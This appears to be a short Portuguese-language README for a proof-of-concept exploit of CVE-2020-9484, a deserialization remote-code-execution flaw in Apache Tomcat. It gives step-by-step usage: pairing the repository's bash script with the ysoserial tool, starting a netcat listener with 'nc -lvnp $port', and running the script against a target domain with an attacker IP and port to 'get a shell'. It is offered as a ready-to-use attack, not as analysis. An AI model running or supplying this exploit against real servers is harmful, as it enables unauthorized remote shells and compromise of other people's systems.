
POC para CVE-2020-9484
POC para CVE-2020-9484
Apache Tomcat RCE por desserialização (CVE-2020-9484)
Explore a documentação »
1. Clone este repositório, então você poderá usar o CVE-2020-9484 e modificar o código-fonte se necessário.
2. Baixe o ysoserial jar
3. coloque ambos CVE-2020-9484 e ysoserial.jar no mesmo diretório
4. obtenha um shell!
Um script bash simples foi escrito para simplificar o uso do CVE-2020-9484.
Ao explorar, você precisará ter um listener netcat pronto
nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port
